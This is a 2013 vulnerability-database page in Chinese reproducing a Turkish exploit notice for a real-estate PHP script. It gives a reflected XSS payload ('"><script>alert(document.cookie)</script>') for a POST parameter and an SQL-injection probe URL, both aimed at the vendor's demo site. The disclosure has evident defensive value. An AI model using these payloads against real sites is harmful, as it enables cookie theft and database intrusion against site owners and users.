Real Estate PHP Script Cross Site Scripting

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044429 漏洞类型
发布时间 2013-09-10 更新时间 2013-09-10
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013090070
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
**********************Cross Site Scripting*******************

< ------------------- header data start ------------------- >


#############################################################


# Application Name     : Real Estate Php Script


# Vulnerable Type     : Post Cross Site Scripting


# Infection          : Ynetici ve User cookieleri alnabilir.


# Bug Fix Advice     : Zararl karakterler filtrelenmelidir.


# Author          : Lazmania61 | Bug Researchers


# Example        : http://real-estate-php-script.com/demo/search_residential.php

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

Post Parameter Name = bos

Post Parameter Value = "><script>alert(document.cookie)</script>

< -- bug code end of -- >



**********************SqL Injection*******************

< ------------------- header data start ------------------- >


#############################################################


# Application Name     : Real Estate Php Script


# Vulnerable Type     : SqL Injection


# Infection          : Ynetici ve User cookieleri alnabilir.


# Bug Fix Advice     : Zararl karakterler filtrelenmelidir.


# Author          : Lazmania61 | Bug Researchers


# Example        : http://real-estate-php-script.com/demo/property_listings_detail.php?listingid=8499

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

http://real-estate-php-script.com/demo/property_listings_detail.php?listingid=8499a

< -- bug code end of -- >